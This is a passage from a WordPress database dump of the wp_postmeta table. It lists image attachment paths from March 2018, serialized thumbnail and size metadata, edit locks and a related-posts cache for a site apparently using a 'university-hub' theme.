"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5670, 1873, '_wp_attached_file', '2018/03/27798250_542868072756052_5701808612592798726_o-1.jpg'),
(5671, 1873, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:60:\"2018/03/27798250_542868072756052_5701808612592798726_o-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"27798250_542868072756052_5701808612592798726_o-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"27798250_542868072756052_5701808612592798726_o-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"27798250_542868072756052_5701808612592798726_o-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"27798250_542868072756052_5701808612592798726_o-1-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"27798250_542868072756052_5701808612592798726_o-1-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5672, 1874, '_wp_attached_file', '2018/03/27907792_542865426089650_8530168288913954526_o.jpg'),
(5673, 1874, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/27907792_542865426089650_8530168288913954526_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"27907792_542865426089650_8530168288913954526_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"27907792_542865426089650_8530168288913954526_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"27907792_542865426089650_8530168288913954526_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"27907792_542865426089650_8530168288913954526_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"27907792_542865426089650_8530168288913954526_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5674, 1864, '_hide_featured', NULL),
(5675, 1864, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575721806;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5769;}i:1;a:1:{s:2:\"id\";i:4026;}i:2;a:1:{s:2:\"id\";i:3975;}}}}'),
(5679, 1864, '_wpas_done_all', '1'),
(5680, 1864, '_thumbnail_id', '1866'),
(5683, 1877, '_edit_lock', '1521089870:3'),
(5684, 1877, '_edit_last', '3'),
(5685, 1878, '_wp_attached_file', '2018/03/28337764_546126165763576_3442392900285698398_o.jpg'),
(5686, 1878, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1728;s:6:\"height\";i:1152;s:4:\"file\";s:58:\"2018/03/28337764_546126165763576_3442392900285698398_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28337764_546126165763576_3442392900285698398_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28337764_546126165763576_3442392900285698398_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28337764_546126165763576_3442392900285698398_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28337764_546126165763576_3442392900285698398_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28337764_546126165763576_3442392900285698398_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5687, 1877, '_thumbnail_id', '1878'),
(5691, 1877, '_hide_featured', NULL),
(5692, 1877, '_wpas_done_all', '1'),
(5695, 1882, '_edit_lock', '1521093233:3'),
(5696, 1882, '_edit_last', '3'),
(5697, 1883, '_wp_attached_file', '2018/03/28378287_550052688704257_3586775167969263616_o.jpg'),
(5698, 1883, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/28378287_550052688704257_3586775167969263616_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28378287_550052688704257_3586775167969263616_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28378287_550052688704257_3586775167969263616_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28378287_550052688704257_3586775167969263616_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28378287_550052688704257_3586775167969263616_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28378287_550052688704257_3586775167969263616_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5699, 1884, '_wp_attached_file', '2018/03/28379794_550062678703258_1361089425458593792_o.jpg'),
(5700, 1884, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/28379794_550062678703258_1361089425458593792_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28379794_550062678703258_1361089425458593792_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28379794_550062678703258_1361089425458593792_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28379794_550062678703258_1361089425458593792_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28379794_550062678703258_1361089425458593792_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28379794_550062678703258_1361089425458593792_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5701, 1885, '_wp_attached_file', '2018/03/28468617_550061042036755_8607802566484426752_o.jpg'),
(5702, 1885, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/28468617_550061042036755_8607802566484426752_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28468617_550061042036755_8607802566484426752_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28468617_550061042036755_8607802566484426752_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28468617_550061042036755_8607802566484426752_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28468617_550061042036755_8607802566484426752_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28468617_550061042036755_8607802566484426752_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5703, 1886, '_wp_attached_file', '2018/03/28468726_550052725370920_2177750102146285568_o.jpg'),
(5704, 1886, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/28468726_550052725370920_2177750102146285568_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28468726_550052725370920_2177750102146285568_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28468726_550052725370920_2177750102146285568_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28468726_550052725370920_2177750102146285568_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28468726_550052725370920_2177750102146285568_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28468726_550052725370920_2177750102146285568_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5705, 1887, '_wp_attached_file', '2018/03/28471494_550052755370917_165237536589873152_o.jpg'),
(5706, 1887, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:57:\"2018/03/28471494_550052755370917_165237536589873152_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"28471494_550052755370917_165237536589873152_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"28471494_550052755370917_165237536589873152_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"28471494_550052755370917_165237536589873152_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"28471494_550052755370917_165237536589873152_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"28471494_550052755370917_165237536589873152_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5707, 1888, '_wp_attached_file', '2018/03/28576414_550062942036565_62988530074255360_o.jpg'),
(5708, 1888, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:56:\"2018/03/28576414_550062942036565_62988530074255360_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"28576414_550062942036565_62988530074255360_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"28576414_550062942036565_62988530074255360_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:56:\"28576414_550062942036565_62988530074255360_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:57:\"28576414_550062942036565_62988530074255360_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:56:\"28576414_550062942036565_62988530074255360_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5709, 1889, '_wp_attached_file', '2018/03/28576547_550052162037643_702948303674802176_o.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(5710, 1889, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:57:\"2018/03/28576547_550052162037643_702948303674802176_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"28576547_550052162037643_702948303674802176_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"28576547_550052162037643_702948303674802176_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"28576547_550052162037643_702948303674802176_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"28576547_550052162037643_702948303674802176_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"28576547_550052162037643_702948303674802176_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5711, 1890, '_wp_attached_file', '2018/03/28577859_550061232036736_1955049390649376768_o.jpg'),
(5712, 1890, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/28577859_550061232036736_1955049390649376768_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28577859_550061232036736_1955049390649376768_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28577859_550061232036736_1955049390649376768_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28577859_550061232036736_1955049390649376768_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28577859_550061232036736_1955049390649376768_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28577859_550061232036736_1955049390649376768_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5713, 1891, '_wp_attached_file', '2018/03/28660448_550061188703407_169774164515749888_o.jpg'),
(5714, 1891, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:57:\"2018/03/28660448_550061188703407_169774164515749888_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"28660448_550061188703407_169774164515749888_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"28660448_550061188703407_169774164515749888_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"28660448_550061188703407_169774164515749888_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"28660448_550061188703407_169774164515749888_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"28660448_550061188703407_169774164515749888_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5715, 1892, '_wp_attached_file', '2018/03/28660485_550063245369868_1310164333237370880_o.jpg'),
(5716, 1892, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/28660485_550063245369868_1310164333237370880_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28660485_550063245369868_1310164333237370880_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28660485_550063245369868_1310164333237370880_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28660485_550063245369868_1310164333237370880_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28660485_550063245369868_1310164333237370880_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28660485_550063245369868_1310164333237370880_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5717, 1882, '_thumbnail_id', '1887'),
(5721, 1882, '_hide_featured', NULL),
(5722, 1882, '_wpas_done_all', '1'),
(5723, 1894, '_edit_lock', '1521099261:3'),
(5724, 1894, '_edit_last', '3'),
(5725, 1895, '_wp_attached_file', '2018/03/28660456_551371961905663_1189305340802367488_n.jpg'),
(5726, 1895, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:58:\"2018/03/28660456_551371961905663_1189305340802367488_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28660456_551371961905663_1189305340802367488_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28660456_551371961905663_1189305340802367488_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28660456_551371961905663_1189305340802367488_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28660456_551371961905663_1189305340802367488_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5727, 1894, '_thumbnail_id', '1895'),
(5731, 1894, '_hide_featured', NULL),
(5732, 1894, '_wpas_done_all', '1'),
(5735, 1898, '_edit_lock', '1521099495:3'),
(5736, 1898, '_edit_last', '3'),
(5737, 1899, '_wp_attached_file', '2018/03/28870515_552413485134844_5365049850813480960_o.jpg'),
